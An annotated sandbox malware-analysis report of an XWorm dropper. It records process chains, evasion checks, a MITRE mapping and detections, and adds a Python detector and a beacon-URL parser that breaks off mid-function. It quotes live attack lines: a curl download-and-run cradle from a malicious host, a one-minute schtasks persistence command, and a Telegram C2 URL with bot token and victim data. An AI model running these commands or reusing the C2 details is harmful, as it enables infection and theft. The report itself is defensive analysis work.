                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -595687s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -595577s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -595466s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -595356s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -595248s >= -30000s
                            Source: C:\Windows\StartMenuExperienceHost.exe TID: 7244 Thread sleep time: -595139s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7280 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7452 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7608 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7688 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 8160 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 3028 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7760 Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                            Source: C:\Windows\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                            Source: C:\Users\user\Desktop\18sFhgSyVK.exe Last function: Thread delayed
                            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                            Source: C:\Windows\System32\svchost.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
                            Source: C:\Windows\StartMenuExperienceHost.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\StartMenuExperienceHost.exeThread delayed: delay time: 595139Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\svchost.exeThread delayed: delay time: 922337203685477
                            Source: StartMenuExperienceHost.exe, 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, StartMenuExperienceHost.exe.4.dr, svchost.exe.12.drBinary or memory string: gQeMuKYZfmdfalx
                            Source: svchost.exe, 00000007.00000002.3719577927.000002B128E64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                            Source: svchost.exe, 00000007.00000002.3719311899.000002B128E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe.12.drBinary or memory string: vmware
                            Source: svchost.exe, 00000007.00000002.3719577927.000002B128E7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000007.00000002.3719130118.000002B128E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                            Source: StartMenuExperienceHost.exe, 0000000C.00000002.3724054665.000000001BD0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                            Source: svchost.exe, 00000007.00000002.3718902466.000002B128E02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                            Source: svchost.exe, 00000007.00000002.3719807106.000002B128F02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: svchost.exe, 00000007.00000002.3719311899.000002B128E4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: curl.exe, 00000004.00000003.1272935149.0000016CB93A4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3719238486.000002117C22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Windows\StartMenuExperienceHost.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Windows\StartMenuExperienceHost.exe | Code function: 12_2_00007FFAAC3B7BE1 CheckRemoteDebuggerPresent, 12_2_00007FFAAC3B7BE1
Source: C:\Windows\StartMenuExperienceHost.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C920C5C IsProcessorFeaturePresent, memset, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_00007FF77C920C5C
Source: C:\Windows\StartMenuExperienceHost.exe | Process token adjusted: Debug (2 events)
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Process token adjusted: Debug (5 events)
Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C9207B4 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, 0_2_00007FF77C9207B4
Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C920E04 SetUnhandledExceptionFilter, 0_2_00007FF77C920E04
Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C920C5C IsProcessorFeaturePresent, memset, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, memset, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, 0_2_00007FF77C920C5C
    The 0_2_00007FF77C920C5C / 0_2_00007FF77C9207B4 / 0_2_00007FF77C920E04 sequences in the dropper are the MSVC x64 CRT's security-cookie failure and unhandled-exception boilerplate (__report_gsfailure / __raise_securityfailure), present in most MSVC-compiled binaries; the IsDebuggerPresent call inside it is compiler-generated and is not by itself evidence of deliberate anti-debugging. The CheckRemoteDebuggerPresent and DebugPort hits in the .NET payload are the ones worth weighing.
Source: C:\Windows\StartMenuExperienceHost.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Process created: C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Process created: C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe /c color b
Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Process created: C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe /c C:\Windows\StartMenuExperienceHost.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe | curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\StartMenuExperienceHost.exe | C:\Windows\StartMenuExperienceHost.exe
Source: C:\Windows\StartMenuExperienceHost.exe | Process created: C:\Windows\System32\schtasks.exe | "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"
    Writing into C:\Windows and registering a task with /RL HIGHEST both require the dropper to have run elevated, as it did in this analysis. The task "svchost" relaunches the Temp copy every minute, so terminating the running process without deleting the task (and both dropped files) leaves the host re-infected within 60 s.
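The process chain above (a download cradle that writes a PE into C:\Windows under a legitimate system binary's name, a system-named binary launched from the wrong directory, and a one-minute scheduled task pointing at a Temp copy) is detectable from process-creation telemetry alone. The following Python is an added example, not part of the Joe Sandbox report: it runs three checks over constructed (parent, image, command line) event tuples modelled on the "Process created" entries above plus two benign controls. The EXPECTED_DIRS table, the USER_WRITABLE fragments and the rule names are this example's own assumptions, not report data.

```python
"""Flag the process chain this report records from process-creation events.

Added example, not part of the Joe Sandbox report. Events are (parent, image,
command line) tuples constructed from the report's "Process created" lines,
plus two benign controls; EXPECTED_DIRS, USER_WRITABLE and the rule names are
this example's assumptions.
"""
import re
from collections import namedtuple

# Where the system binaries this sample impersonates normally live (assumption).
EXPECTED_DIRS = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "startmenuexperiencehost.exe": {
        r"c:\windows\systemapps\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy"},
}
# Path fragments any user can write to (assumption; lower-case, backslash-delimited).
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
PE_EXTENSIONS = (".exe", ".dll", ".scr")

SAMPLE_EVENTS = [  # constructed from the report's "Process created" entries
    (r"C:\Users\user\Desktop\18sFhgSyVK.exe", r"C:\Windows\System32\cmd.exe",
     r"C:\Windows\system32\cmd.exe /c curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\curl.exe",
     r"curl https://r2.hypixel.cfd/svchost.exe -o C:\Windows\StartMenuExperienceHost.exe --silent"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\StartMenuExperienceHost.exe",
     r"C:\Windows\StartMenuExperienceHost.exe"),
    (r"C:\Windows\StartMenuExperienceHost.exe", r"C:\Windows\System32\schtasks.exe",
     r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user~1\AppData\Local\Temp\svchost.exe"'),
    # benign controls (constructed): the real svchost.exe and a daily task under Program Files
    (r"C:\Windows\System32\services.exe", r"C:\Windows\System32\svchost.exe",
     r"C:\Windows\System32\svchost.exe -k netsvcs -p"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /sc daily /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'),
]

TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # a quoted argument or a bare word
Alert = namedtuple("Alert", "rule parent subject detail")


def tokens(cmdline):
    """Split a Windows command line, dropping the quotes around quoted arguments."""
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def dirname(path):
    p = path.replace("/", "\\")
    return p.rsplit("\\", 1)[0].lower() if "\\" in p else ""


def misplaced_system_name(path):
    """True when a watched system binary name sits outside its expected directory."""
    name = basename(path)
    return name in EXPECTED_DIRS and dirname(path) not in EXPECTED_DIRS[name]


def check_masquerading(image):
    if misplaced_system_name(image):
        return ("system_process_name_in_unexpected_location", image, dirname(image))
    return None


def check_download_cradle(cmdline):
    """curl writing a PE to disk, the report's cmd.exe /c curl ... -o ... pattern."""
    toks = tokens(cmdline)
    if not any(basename(t) in ("curl", "curl.exe") for t in toks):
        return None
    url = next((t for t in toks if t.lower().startswith(("http://", "https://"))), "?")
    for flag, target in zip(toks, toks[1:]):
        if flag in ("-o", "--output") and target.lower().endswith(PE_EXTENSIONS):
            return ("curl_writes_executable", target, url)
    return None


def check_schtasks_persistence(cmdline):
    """schtasks /create whose action runs too often or from a user-writable path."""
    toks = tokens(cmdline)
    low = [t.lower() for t in toks]
    if not low or basename(low[0]) not in ("schtasks", "schtasks.exe") or "/create" not in low:
        return None

    def arg(flag):  # value following a switch, or "" when absent
        i = low.index(flag) if flag in low else -1
        return toks[i + 1] if 0 <= i < len(toks) - 1 else ""

    target, reasons = arg("/tr"), []
    if arg("/sc").lower() == "minute":
        reasons.append("runs every minute")
    if any(frag in target.lower() for frag in USER_WRITABLE):
        reasons.append("action lives in a user-writable path")
    if misplaced_system_name(target):
        reasons.append("action borrows a system binary's name")
    return ("scheduled_task_persistence", target, "; ".join(reasons)) if reasons else None


def scan(events):
    """Run every check over (parent, image, cmdline) events and collect alerts."""
    alerts = []
    for parent, image, cmdline in events:
        for hit in (check_masquerading(image), check_download_cradle(cmdline),
                    check_schtasks_persistence(cmdline)):
            if hit:
                alerts.append(Alert(hit[0], parent, hit[1], hit[2]))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"{a.rule:45} {a.subject}  [{a.detail}]")
```

Run against the constructed events, the four malicious lines raise four alerts (the cradle fires once for cmd.exe and once for its curl.exe child, which is the expected shape of a parent/child pair) and the two benign controls raise none. The expected-directory check is what separates the dropped StartMenuExperienceHost.exe in C:\Windows from the genuine one under C:\Windows\SystemApps.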

Language, Device and Operating System Detection

Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation (6 events)
Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation (2 events)
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\StartMenuExperienceHost.exe | Queries volume information: C:\Windows\StartMenuExperienceHost.exe VolumeInformation
Source: C:\Windows\StartMenuExperienceHost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\svchost.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\svchost.exe VolumeInformation (7 events)
Source: C:\Users\user\Desktop\18sFhgSyVK.exe | Code function: 0_2_00007FF77C920E78 GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, 0_2_00007FF77C920E78
    This API combination is the MSVC CRT's security-cookie initialisation (__security_init_cookie) and appears in practically every MSVC-compiled binary; it is not a fingerprinting or timing indicator on its own.
Source: C:\Windows\StartMenuExperienceHost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
    The writer here is the genuine C:\Windows\System32\svchost.exe (the Security Center service host), not the dropped C:\Users\user\AppData\Local\Temp\svchost.exe; the name collision is precisely what the sample's choice of file name is meant to exploit when an analyst reads logs.
Source: svchost.exe, 00000009.00000002.3720185441.0000025157F02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 00000009.00000002.3720185441.0000025157F02000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3724054665.000000001BD28000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3724054665.000000001BD0A000.00000004.00000020.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000C.00000002.3724844812.000000001CADE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\StartMenuExperienceHost.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct (2 events)

Stealing of Sensitive Information

Source: Yara match | File source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 1456, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED

Source: Yara match | File source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3720613599.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 1456, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match | File source: sslproxydump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 1456, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED

Source: Yara match | File source: 12.0.StartMenuExperienceHost.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000000.1274279217.0000000000B32000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3720613599.0000000002E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3720613599.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: StartMenuExperienceHost.exe PID: 1456, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\svchost.exe, type: DROPPED
Source: Yara match | File source: C:\Windows\StartMenuExperienceHost.exe, type: DROPPED
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK matrix (rebuilt per tactic from the flattened grid; the bracketed digits are the badge numbers the report's matrix attaches to a technique, reproduced as extracted; techniques without a badge are the matrix's standard placeholder entries)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Windows Management Instrumentation [12]; Scheduled Task/Job [1]; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading [1]; Windows Service [1]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading [1]; Windows Service [1]; Process Injection [11]; Scheduled Task/Job [1]; Registry Run Keys / Startup Folder [21]; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [1]; Software Packing [2]; DLL Side-Loading [1]; Masquerading [221]; Virtualization/Sandbox Evasion [171]; Process Injection [11]
Credential Access: Input Capture [11]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery [1]; File and Directory Discovery [1]; System Information Discovery [34]; Security Software Discovery [571]; Process Discovery [1]; Virtualization/Sandbox Evasion [171]; Application Window Discovery [1]; System Network Configuration Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data [11]; Input Capture [11]; Clipboard Data [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Web Service [1]; Ingress Tool Transfer [13]; Encrypted Channel [11]; Non-Standard Port [1]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior graph (rebuilt from the graph's text; Behavior Graph ID 1561587, sample 18sFhgSyVK.exe, start date 23/11/2024, architecture WINDOWS, score 100; the numbers after a process name are the graph's created-registry-value / created-file counters as its legend defines them)

Sample-level: api.telegram.org, r2.hypixel.cfd and 2 other IPs or domains; Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 19 other signatures; Uses the Telegram API (likely for C&C communication) (api.telegram.org)

18sFhgSyVK.exe (1)
  cmd.exe (1)  [Drops executables to the windows directory (C:\Windows) and starts them]
    StartMenuExperienceHost.exe (15, 6)
      ip-api.com 208.95.112.1:80, local port 49702 (TUT-ASUS, United States)
      api.telegram.org 149.154.167.220:443, local port 49704 (TELEGRAMRU, United Kingdom)
      104.198.168.179:1337, local port 49711 (GOOGLEUS, United States)
      dropped: C:\Users\user\AppData\Local\...\svchost.exe (PE32)
      [Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); 6 other signatures]
      schtasks.exe (1)
        conhost.exe
  cmd.exe (1)
    curl.exe (2)
      r2.hypixel.cfd 172.66.0.158:443, local port 49701 (CLOUDFLARENETUS, United States)
      127.0.0.1 (unknown)
      dropped: C:\Windows\StartMenuExperienceHost.exe (PE32)
  conhost.exe
  cmd.exe (1)
svchost.exe (1)  [Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file]
svchost.exe  [Changes security center settings (notifications, updates, antivirus, firewall)]
  MpCmdRun.exe
    conhost.exe
10 other processes

Submitted file

Source | Detection | Scanner | Label
18sFhgSyVK.exe | 24% | ReversingLabs |

Dropped files

Source | Detection | Scanner | Label
C:\Windows\StartMenuExperienceHost.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Avira | TR/Spy.Gen
C:\Windows\StartMenuExperienceHost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\svchost.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\svchost.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.CryptConsole
C:\Windows\StartMenuExperienceHost.exe | 88% | ReversingLabs | ByteCode-MSIL.Ransomware.CryptConsole

No Antivirus matches
No Antivirus matches

URLs

Source | Detection | Scanner | Label
https://r2.hypixel.cfd/svchost.exe-oC: | 0% | Avira URL Cloud | safe
https://r2.hypixel.cfd/svchost.exe | 100% | Avira URL Cloud | malware
104.198.168.179 | 0% | Avira URL Cloud | safe
https://r2.hypixel.cfd/svchost.exe( | 0% | Avira URL Cloud | safe

The first and last URL rows are string-extraction artifacts of curl's command line (the download URL run together with the following "-o C:..." argument, and with a trailing stray character), which is why they score 0%; the payload URL itself is the second row.
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
r2.hypixel.cfd | 172.66.0.158 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
time.windows.com | unknown | unknown | false | | high

Contacted URLs and IPs

Name | Malicious | Antivirus Detection | Reputation
104.198.168.179 | true | Avira URL Cloud: safe | unknown
https://r2.hypixel.cfd/svchost.exe | true | Avira URL Cloud: malware | unknown
https://api.telegram.org/botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | false | | high
127.0.0.1 | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
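The Telegram sendMessage URL in the table above carries the whole XWorm beacon: the bot token in the URL path, the operator's chat_id, and a percent-encoded "Key : Value" report of the victim (client ID, user name, OS, USB, CPU, GPU, RAM, group). The following Python is an added example, not part of the Joe Sandbox report or of XWorm, that parses such a URL into the values a responder would block, report to Telegram, or pivot on. The URL it parses is copied verbatim from the table above; treating the builder's misspelt "New Clinet" key as the client ID is this example's assumption, and the parser takes the path segment after "bot" as the token exactly as the report lists it (a full Bot API token has the form <bot_id>:<secret>, so a truncated listing yields a truncated token). Nothing here touches the network.

```python
"""Parse an XWorm Telegram beacon URL into its C2 and victim fields.

Added example for this report, not Joe Sandbox or XWorm code. BEACON_URL is
copied from the report's URL table; the "New Clinet" handling is an assumption.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Beacon URL exactly as listed in the report's contacted-URL table.
BEACON_URL = (
    "https://api.telegram.org/botAAFa5s6Qc5oDxqbipfR5RrOfgeTLKQlipKI/sendMessage"
    "?chat_id=7856673158&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20"
    ":%20%0D%0A66ED47A5B18832423BF5%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20"
    "Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20"
    ":%209TXRTVEZ%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6"
)

HEADER_RE = re.compile(r"\[(\w+)\s+V([\d.]+)\]")  # first line, e.g. "[XWorm V5.6]"


def parse_telegram_beacon(url):
    """Return bot_token, method, chat_id, family, version, client_id and the victim fields."""
    parts = urlsplit(url)
    if parts.netloc.lower() != "api.telegram.org":
        raise ValueError("not a Telegram Bot API URL: %s" % parts.netloc)
    # Bot API paths are /bot<TOKEN>/<method>; the token is the credential to report/revoke.
    segments = parts.path.strip("/").split("/")
    if len(segments) != 2 or not segments[0].startswith("bot"):
        raise ValueError("unexpected Bot API path: %s" % parts.path)
    token, method = segments[0][len("bot"):], segments[1]

    query = parse_qs(parts.query)           # parse_qs percent-decodes the values for us
    chat_id = query.get("chat_id", [""])[0]
    text = query.get("text", [""])[0]

    lines = text.splitlines()               # the %0D%0A separators become line breaks
    family = version = None
    if lines:
        m = HEADER_RE.search(lines[0])
        if m:
            family, version = m.group(1), m.group(2)

    # Body lines are "Key : Value". XWorm puts the client ID on the line after an
    # empty-valued "New Clinet :" key, so an empty value takes the next non-empty line.
    fields = {}
    i = 1
    while i < len(lines):
        key, sep, value = lines[i].partition(" : ")
        i += 1
        if not sep:
            continue
        value = value.strip()
        while not value and i < len(lines):
            value = lines[i].strip()
            i += 1
        fields[key.strip()] = value

    # Assumption: the key starting "New Cl" (builder typo "Clinet") carries the victim ID.
    is_id = lambda k: k.lower().startswith("new cl")
    client_id = next((v for k, v in fields.items() if is_id(k)), None)
    return {
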